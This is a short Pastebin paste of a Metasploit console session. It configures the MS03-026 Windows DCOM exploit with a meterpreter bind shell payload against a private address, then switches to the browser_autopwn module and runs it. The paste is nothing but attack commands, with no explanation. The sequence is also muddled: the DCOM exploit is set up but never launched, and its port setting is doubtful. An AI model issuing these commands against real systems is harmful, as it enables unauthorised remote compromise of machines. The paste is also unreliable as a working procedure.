Advertisement
Guest User

Untitled

a guest
Jul 23rd, 2016
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. root > sudo msfconsole
  2. msf > use exploit/windows/dcerpc/ms03_026_dcom
  3. msf exploit (ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
  4. msf exploit (ms03_026_dcom) > set RHOST 192.168.1.9
  5. msf exploit (ms03_026_dcom) > set RPORT 445
  6. msf exploit (ms03_026_dcom) > use auxiliary/server/browser_autopwn
  7. msf auxiliary (browser_autopwn) > set LHOST 192.168.1.10
  8. msf auxiliary (browser_autopwn) > exploit
  9.  
  10. .....
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement